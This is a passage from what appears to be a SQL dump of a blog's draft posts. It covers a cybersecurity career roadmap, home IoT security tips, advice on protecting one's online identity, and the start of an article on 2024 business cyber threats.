[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Logs Management</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">User Management</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Spend 1-2 months gaining practical experience with both. While <b><strong class=\"font-bold\">CompTIA Linux+</strong></b> can validate your Linux knowledge, it’s not as essential as networking or cybersecurity certifications. 
Use training platforms and hands-on practice to solidify your understanding.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Learn Basic Coding</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While you don’t need to be an expert programmer to start in cybersecurity, coding skills can enhance your effectiveness in the role. The most valuable programming language to learn is <b><strong class=\"font-bold\">Python</strong></b> due to its simplicity and versatility within cybersecurity tasks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommended Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Python basics, including automation scripts</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Bash scripting (for Linux environments)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">PowerShell scripting (for Windows environments)</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Python tutorials (like the ones mentioned on the YouTube channel) are a great place to begin—start with beginner-friendly lessons. 
Spend about a month practicing and applying your coding skills to common security scenarios.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 5: Cybersecurity Fundamentals</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By this stage, you’ll have the foundational skills in IT, networking, and coding. Now, it\'s time to shift into cybersecurity-specific concepts. This involves identifying vulnerabilities, protecting data, and defending systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommended Certifications:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">CompTIA Security+</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Google Cybersecurity Professional Certificate</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">CompTIA Security+</strong></b> is especially well-recognized and often a requirement for entry-level positions. 
Allocate around 1-2 months to master cybersecurity fundamentals and complete an introduction to defensive (blue team) and offensive (red team) strategies.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 6: Defensive Security (Blue Team)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Defensive security focuses on safeguarding systems and responding to threats. Mastering this area will prepare you for roles in monitoring and defending network systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What to Learn:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Threat detection and analysis</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Log management and interpretation</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Network security best practices</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Certifications to Explore:</strong></b></p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cisco CyberOps Associate</strong></b> (well-respected certification in defensive 
security)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">PNSA by TCM Security</strong></b> (hands-on training for realistic network defense tasks)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">PTL1 by Security Blue Team</strong></b> (focused on real-world defensive tasks)</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Spend 1-2 months mastering these skills and certifications.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 7: Offensive Security (Red Team)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Offensive security involves identifying weaknesses through penetration testing and network scanning. 
This knowledge allows you to think like an attacker and defend systems more effectively.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Focus Areas:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Network scanning techniques</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Vulnerability exploitation</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Simulated hacking practices via safe testing environments</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Platforms for Practice:</strong></b></p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">TryHackMe</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Hack The Box</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Certifications to Pursue:</strong></b></p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 
[&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">eJPT (eLearnSecurity Junior Penetration Tester)</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">CompTIA PenTest+</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">PJP by TCM Security</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Dedicate 1-2 months to building practical offensive security skills.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 8: Hands-On Practice with Labs</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Employers value real-world experience, so supplement your learning with hands-on practice. Labs and simulations help you develop the critical skills required in the field. Use online platforms like <b><strong class=\"font-bold\">RangeForce</strong></b>, <b><strong class=\"font-bold\">Immersive Labs</strong></b>, or <b><strong class=\"font-bold\">Hack The Box</strong></b>, and document your projects or challenges to showcase during interviews.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tips for Standing Out to Employers</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While certifications are valuable, employers are more interested in practical skills and how you apply them to solve real-world problems. 
Showcase your expertise by:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Creating and maintaining a GitHub portfolio of your projects</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Participating in CTF (Capture The Flag) challenges to test and demonstrate your skills</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Taking on freelance or internship opportunities to gain hands-on experience</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Long Will It Take?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you can dedicate 3-5 hours of study and practice daily, this roadmap can take around 7-10 months to complete. However, cybersecurity is a dynamic field, and everyone learns at a different pace. Don’t hesitate to take extra time if needed—it’s more important to thoroughly understand each step than to rush through.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The path to becoming a cybersecurity professional may seem daunting, but it’s achievable with the right approach. Follow this roadmap, stay consistent, and put in the effort to learn and practice. 
Remember, the cybersecurity field rewards curiosity, adaptability, and problem-solving skills.</p>', '', NULL, NULL, 1, 'draft', '2024-12-21 00:07:48', '2026-01-12 21:41:44', 'Information Security', 'The Complete Roadmap to Land Your First Cybersecurity Job in 7-10 Months', '', NULL),
(85, 'How to Secure Your Internet of Things (IoT) Devices', 'how-to-secure-your-internet-of-things-iot-devices', 'Did you know that approximately 98% of IoT device traffic is unencrypted? This shocking statistic shows just how vulnerable these devices can be. Internet of Things (IoT) devices include everything from smart thermostats to security cameras, and their convenience comes with risks. With the rapid growth of these technologies, securing them has never been more important. Cyber threats targeting IoT devices are on the rise, leading to data breaches and unauthorized access, affecting users in serious ways.\r\n<h2 id=\"understanding-iot-vulnerabilities\">Understanding IoT Vulnerabilities</h2>\r\n<h3 id=\"common-iot-security-threats\">Common IoT Security Threats</h3>\r\nIoT devices face a variety of threats. Some common ones include:\r\n<ul>\r\n 	<li><strong>Malware:</strong> Malicious software can hijack devices, enabling attackers to gain control.</li>\r\n 	<li><strong>Phishing:</strong> This tactic tricks users into revealing login details, often compromising devices.</li>\r\n 	<li><strong>Data Breaches:</strong> Sensitive information can be stolen from improperly secured devices.</li>\r\n 	<li><strong>Denial-of-Service Attacks:</strong> Cybercriminals can overwhelm devices, causing them to fail.</li>\r\n</ul>\r\nA well-known incident involved a smart camera hack that allowed unauthorized access to homeowners\' live feeds, highlighting the real risks of poor security.\r\n<h3 id=\"weak-passwords-and-default-credentials\">Weak Passwords and Default Credentials</h3>\r\nMany users fail to change default passwords on their IoT devices. This is a significant risk. According to research, nearly 80% of data breaches involve weak or stolen passwords. Always create strong, unique passwords for each device.\r\n<h3 id=\"lack-of-software-updates\">Lack of Software Updates</h3>\r\nRegular software updates are vital for maintaining security. 
They fix weaknesses that hackers could exploit. Experts suggest checking for updates at least once a week to ensure devices are protected against known vulnerabilities.\r\n<h2 id=\"securing-your-home-network\">Securing Your Home Network</h2>\r\n<h3 id=\"strong-router-password\">Strong Router Password</h3>\r\nYour router is the gateway to your home network. Change its default administrator password (not only the Wi-Fi password) and create a strong one, ideally using a mix of letters, numbers, and symbols. Avoid predictable words or phrases. Passwords should be at least 12 characters long. Keep the router firmware updated, and disable administration from the internet (WAN side) unless you genuinely need it.\r\n<h3 id=\"firewall-protection\">Firewall Protection</h3>\r\nFirewalls act as a barrier between your network and potential threats. Most routers come with built-in firewalls. Check the settings to ensure they are activated. Configure your firewall to block unwanted inbound traffic and, where the router supports it, set alerts for suspicious activities.\r\n<h3 id=\"network-segmentation\">Network Segmentation</h3>\r\nSeparate your IoT devices from your main network, for example by placing them on a guest Wi-Fi network or a separate VLAN. This way, if one device gets hacked, attackers are limited in what they can reach, such as your laptops, phones, and network storage. Tutorials online can guide you through setting this up with your router.\r\n<h2 id=\"choosing-secure-iot-devices\">Choosing Secure IoT Devices</h2>\r\n<h3 id=\"research-device-security-features\">Research Device Security Features</h3>\r\nBefore buying any IoT device, look into its security features. Features like end-to-end encryption, automatic updates, and a published end-of-support date can significantly enhance security.\r\n<h3 id=\"reputable-brands\">Reputable Brands</h3>\r\nPurchase devices from well-known brands. These companies are more likely to produce items that receive regular security updates and patches, ensuring your devices remain safe.\r\n<h3 id=\"read-reviews\">Read Reviews</h3>\r\nExplore online reviews focusing on the security aspects of a device. 
Users often share their experiences with vulnerabilities and how the manufacturer responded.\r\n<h2 id=\"implementing-strong-security-practices\">Implementing Strong Security Practices</h2>\r\n<h3 id=\"enable-two-factor-authentication-2fa\">Enable Two-Factor Authentication (2FA)</h3>\r\nTwo-factor authentication adds an extra layer of protection. This means you need both a password and a second step, such as a code from an authenticator app. Text message (SMS) codes are better than nothing, but they can be intercepted or captured through SIM swapping, so prefer an app or a hardware security key where the vendor offers one. Many IoT devices and their companion cloud accounts allow you to set this up in their settings.\r\n<h3 id=\"regular-software-updates\">Regular Software Updates</h3>\r\nMake it a habit to check for firmware updates regularly. Some devices offer automatic updates, which can take the hassle out of securing your devices. Enable this setting wherever possible, and retire devices the manufacturer no longer patches.\r\n<h3 id=\"disable-unnecessary-features\">Disable Unnecessary Features</h3>\r\nMany IoT devices come with features you may not need. Disable options like remote (internet-facing) access or voice activation if they aren\'t necessary, and turn off UPnP on your router so devices cannot silently open ports to the internet. Fewer active features mean fewer avenues for attacks.\r\n<h2 id=\"monitoring-your-iot-devices\">Monitoring Your IoT Devices</h2>\r\n<h3 id=\"network-monitoring-tools\">Network Monitoring Tools</h3>\r\nUtilize network monitoring tools, such as Fing or Network Monitor, to keep an eye on your home network. These tools can identify unusual device activity, flagging potential breaches quickly.\r\n<h3 id=\"security-alerts\">Security Alerts</h3>\r\nSet up alerts for your devices. Many smart devices can inform you of unusual access attempts or suspicious behavior, allowing you to respond swiftly if something seems off.\r\n<h3 id=\"regular-security-audits\">Regular Security Audits</h3>\r\nSchedule regular checks of your IoT devices and home network. Look for changes in device behavior and ensure all security settings remain in place.\r\n\r\nIn summary, securing your IoT devices is essential to keeping your personal information safe. Weak passwords, lack of updates, and unsecured networks can lead to severe consequences. 
By employing proactive measures—such as strong passwords, research, and regular monitoring—you can better protect your devices. Don’t wait for a security breach to take action. Start implementing these practices today to ensure your IoT environment is as safe as possible.', '', NULL, NULL, 1, 'draft', '2024-12-11 16:55:18', '2026-01-12 21:41:44', 'Information Security', 'How to Secure Your Internet of Things (IoT) Devices', '', NULL),
(86, 'How to Protect Your Online Identity', 'how-to-protect-your-online-identity', 'The internet is an essential part of our lives, but it comes with risks. Identity theft and online fraud are on the rise, making it crucial to protect your online identity. With data collection everywhere and increasingly sophisticated scams, taking charge of your digital self has never been more critical.\r\n<h3 id=\"the-pervasiveness-of-data-collection-in-the-digital-age\">The pervasiveness of data collection in the digital age</h3>\r\nEvery time you log in to a website, use an app, or post on social media, your data might be collected. Companies and hackers are eager to get this information for marketing or malicious purposes.\r\n<h3 id=\"statistics-on-identity-theft-and-online-fraud\">Statistics on identity theft and online fraud</h3>\r\nAccording to recent studies, millions of people fall victim to identity theft annually. The Federal Trade Commission (FTC) reported over $3 billion lost due to fraud in just one year.\r\n<h3 id=\"the-importance-of-proactive-identity-protection\">The importance of proactive identity protection</h3>\r\nWith these numbers, it\'s clear that taking steps to protect yourself is necessary. Identifying risks and acting early can save you from stress and financial loss.\r\n<h2 id=\"secure-your-passwords-and-accounts\">Secure Your Passwords and Accounts</h2>\r\n<h3 id=\"best-practices-for-creating-strong-unique-passwords\">Best practices for creating strong, unique passwords</h3>\r\nTo secure your accounts, start with strong, unique passwords. 
Avoid using easy-to-guess words like “123456” or “password.” Instead, consider these tips:\r\n<ul>\r\n 	<li>Combine letters, numbers, and symbols for complexity.</li>\r\n 	<li>Use a mix of upper and lower-case letters.</li>\r\n 	<li>Aim for at least 12 characters; a long passphrase of several random words is both strong and memorable.</li>\r\n 	<li>Never reuse a password across sites, so one breach cannot unlock your other accounts.</li>\r\n</ul>\r\n<h4 id=\"password-managers-and-their-benefits\">Password managers and their benefits</h4>\r\nPassword managers can help store and create complex passwords, so you don’t have to remember them all. They also can help you identify weak or reused passwords, and because a manager only autofills on the exact domain it saved, it will refuse to fill your credentials into a look-alike phishing site.\r\n<h4 id=\"two-factor-authentication-2fa-and-multi-factor-authentication-mfa\">Two-factor authentication (2FA) and multi-factor authentication (MFA)</h4>\r\nEnable 2FA or MFA on your accounts whenever possible. This adds a layer of security, requiring you to verify your identity through a second step, such as an authenticator app or a hardware security key. Text message codes are a weaker fallback, since they can be intercepted or SIM-swapped.\r\n<h3 id=\"regularly-updating-passwords-and-enabling-account-recovery-options\">Regularly updating passwords and enabling account recovery options</h3>\r\nChange a password promptly whenever the service reports a breach or you notice suspicious activity. Routine rotation of strong, unique passwords on a fixed schedule is no longer recommended (see NIST SP 800-63B), because it pushes people toward weaker, predictable variations. Set up recovery options, such as a backup email address or one-time recovery codes, to regain access if needed, and treat security questions with caution, since their answers are often guessable or publicly discoverable.\r\n<ul>\r\n 	<li>Remember: examples like the Facebook and LinkedIn breaches show how vital it is to keep passwords secure.</li>\r\n</ul>\r\n<h3 id=\"the-importance-of-choosing-strong-unique-passwords-for-financial-accounts\">The importance of choosing strong, unique passwords for financial accounts</h3>\r\nYour financial information is a prime target, so use unique and strong passwords for banking and shopping sites to keep your money safe.\r\n<h2 id=\"protect-your-personal-information-online\">Protect Your Personal Information Online</h2>\r\n<h3 id=\"avoiding-phishing-scams-and-suspicious-emails\">Avoiding phishing scams and suspicious emails</h3>\r\nLearn to spot phishing attempts, which often come disguised as legitimate emails. 
Keep an eye out for:\r\n<ul>\r\n 	<li>Misspellings or poor grammar.</li>\r\n 	<li>Urgency or threats to take immediate action.</li>\r\n 	<li>Unknown senders or strange email addresses.</li>\r\n 	<li>Links whose visible text does not match the address shown when you hover over them.</li>\r\n</ul>\r\n<h4 id=\"red-flags-of-phishing-emails-and-websites\">Red flags of phishing emails and websites</h4>\r\nAlways double-check URLs before clicking, and read the domain name itself rather than the padlock icon. HTTPS only means the connection is encrypted; it does not prove the site is legitimate, and most phishing sites now use HTTPS too. When in doubt, type the address you know or use a saved bookmark instead of following the link.\r\n<h4 id=\"real-world-examples-of-successful-phishing-campaigns\">Real-world examples of successful phishing campaigns</h4>\r\nHigh-profile cases, like the Google and Facebook scam in which a fraudster posed as a hardware supplier and invoiced both companies for over $100 million, show that even big companies can fall victim.\r\n<h3 id=\"safeguarding-your-social-media-presence\">Safeguarding your social media presence</h3>\r\nAdjust privacy settings on social media accounts. Only share what’s necessary and avoid revealing sensitive information like your location or full birth date, which are also common answers to security questions.\r\n<h3 id=\"being-mindful-of-public-wi-fi-and-unsecured-networks\">Being mindful of public Wi-Fi and unsecured networks</h3>\r\nThink twice before using public Wi-Fi for sensitive activities. Instead, use a VPN or wait until you’re on a secure network.\r\n<h2 id=\"monitor-your-online-activity-and-credit-reports\">Monitor Your Online Activity and Credit Reports</h2>\r\n<h3 id=\"regularly-checking-your-credit-report-for-any-suspicious-activity\">Regularly checking your credit report for any suspicious activity</h3>\r\nKeep an eye on your credit report for unauthorized accounts. You’re entitled to one free report from each credit bureau annually.\r\n<h4 id=\"the-role-of-credit-monitoring-services\">The role of credit monitoring services</h4>\r\nConsider signing up for credit monitoring services to automatically track your credit and alert you to any changes. Monitoring only tells you after the fact; a credit freeze, which each bureau must offer for free, actually blocks new accounts from being opened in your name until you lift it.\r\n<h4 id=\"steps-to-take-if-you-discover-fraudulent-activity\">Steps to take if you discover fraudulent activity</h4>\r\nIf you spot suspicious activity, report it immediately to your bank and credit card companies. 
They can help you mitigate damage.\r\n<h3 id=\"utilizing-online-security-tools-and-monitoring-software\">Utilizing online security tools and monitoring software</h3>\r\nChoose reputable security software, like Norton or McAfee, to help ward off online threats. Regular scans can catch issues before they escalate.\r\n<h3 id=\"the-importance-of-proactive-monitoring\">The importance of proactive monitoring</h3>\r\nStay proactive with regular monitoring of your online accounts and activity. Turn on login alerts where a service offers them, and periodically review the list of active sessions and connected apps in each account, signing out anything you do not recognize. It can help you catch problems early.\r\n<h2 id=\"safe-browsing-habits-and-digital-literacy\">Safe Browsing Habits and Digital Literacy</h2>\r\n<h3 id=\"educating-yourself-on-common-online-threats-and-scams\">Educating yourself on common online threats and scams</h3>\r\nHone your skills by exploring resources on online safety. The FTC and cybersecurity websites offer great information.\r\n<h3 id=\"staying-up-to-date-on-the-latest-online-threats\">Staying up-to-date on the latest online threats</h3>\r\nStay informed about online scams to avoid falling victim. Subscribe to alerts or newsletters that help you stay aware of new threats.\r\n<h3 id=\"using-secure-websites-and-apps\">Using secure websites and apps</h3>\r\nAlways look for secure websites. A URL starting with \"HTTPS\" means traffic between you and the site is encrypted in transit; it does not prove the site is trustworthy, because attackers obtain certificates for phishing domains too, so check that the domain name is the one you expect. Only download apps from trusted sources like Google Play or Apple’s App Store.\r\n<h2 id=\"responding-to-identity-theft-or-online-fraud\">Responding to Identity Theft or Online Fraud</h2>\r\n<h3 id=\"steps-to-take-if-you-suspect-your-identity-has-been-compromised\">Steps to take if you suspect your identity has been compromised</h3>\r\nIf you suspect your identity\'s been stolen, act fast. Report it to the FTC and your bank to limit losses.\r\n<h4 id=\"reporting-identity-theft-to-the-appropriate-authorities\">Reporting identity theft to the appropriate authorities</h4>\r\nFile a report with your local police and the FTC. 
They can help you navigate recovery.\r\n<h3 id=\"utilizing-resources-for-victims-of-online-fraud\">Utilizing resources for victims of online fraud</h3>\r\nVarious agencies offer support for victims. Check out the FTC’s IdentityTheft.gov for resources and recovery steps.\r\n<h3 id=\"the-importance-of-expert-advice-on-recovery\">The importance of expert advice on recovery</h3>\r\nDon’t hesitate to reach out to professionals for advice. They can provide tailored assistance to help you recover from identity theft.\r\n<h2 id=\"conclusion-taking-control-of-your-digital-security\">Conclusion: Taking Control of Your Digital Security</h2>\r\n<h3 id=\"key-takeaways-and-actionable-steps-for-improved-online-safety\">Key takeaways and actionable steps for improved online safety</h3>\r\nStart now by reviewing your online accounts, strengthening your passwords, and educating yourself about online threats.\r\n<h3 id=\"the-ongoing-need-for-vigilance-in-protecting-your-online-identity\">The ongoing need for vigilance in protecting your online identity</h3>\r\nRemember that protecting your identity is an ongoing task. Regularly monitoring and learning are essential.\r\n<h3 id=\"encouraging-proactive-behavior-and-continuous-learning\">Encouraging proactive behavior and continuous learning</h3>\r\nBy making online safety a priority, you can enjoy the internet knowing you’re safeguarded against potential risks. Your digital identity is worth the effort.', '', NULL, NULL, 1, 'draft', '2024-12-11 14:57:51', '2026-01-12 21:41:44', 'Information Security', 'How to Protect Your Online Identity', '', NULL),
(87, 'Top 10 Cybersecurity Threats Facing Businesses in 2024', 'top-10-cybersecurity-threats-facing-businesses-in-2024', 'Cybersecurity remains a critical concern for businesses in 2024. The global cost of cyberattacks is projected to reach $10.5 trillion annually, creating a pressing need for organizations to strengthen their security measures. With the ever-evolving threat landscape, cybercriminals continually adapt their tactics, making it essential for companies to stay ahead of these challenges. This article outlines the top 10 cybersecurity threats of 2024 and provides actionable mitigation strategies.\r\n<h2 id=\"ransomware-attacks\">Ransomware Attacks</h2>\r\n<h3 id=\"the-rise-of-ransomware-as-a-service-raas\">The Rise of Ransomware-as-a-Service (RaaS)</h3>\r\nRansomware-as-a-Service has transformed the way ransomware attacks are conducted. The number of RaaS incidents has spiked by 50% compared to last year, making it easier for attackers to target businesses. A notable example is the attack on a major healthcare provider last year, which resulted in the leakage of sensitive patient data.\r\n<h3 id=\"ransomware-mitigation-strategies\">Ransomware Mitigation Strategies</h3>\r\n<ul>\r\n 	<li><strong>Data Backups:</strong> Regularly back up data and store it offline.</li>\r\n 	<li><strong>Employee Training:</strong> Conduct training sessions to raise awareness about ransomware threats.</li>\r\n 	<li><strong>Multi-Factor Authentication:</strong> Implement MFA to add an extra layer of security. Experts agree this is crucial.</li>\r\n</ul>\r\n<h2 id=\"phishing-and-social-engineering\">Phishing and Social Engineering</h2>\r\n<h3 id=\"sophistication-of-phishing-techniques\">Sophistication of Phishing Techniques</h3>\r\nPhishing tactics have become more advanced, with spear phishing and clone phishing leading the pack. 
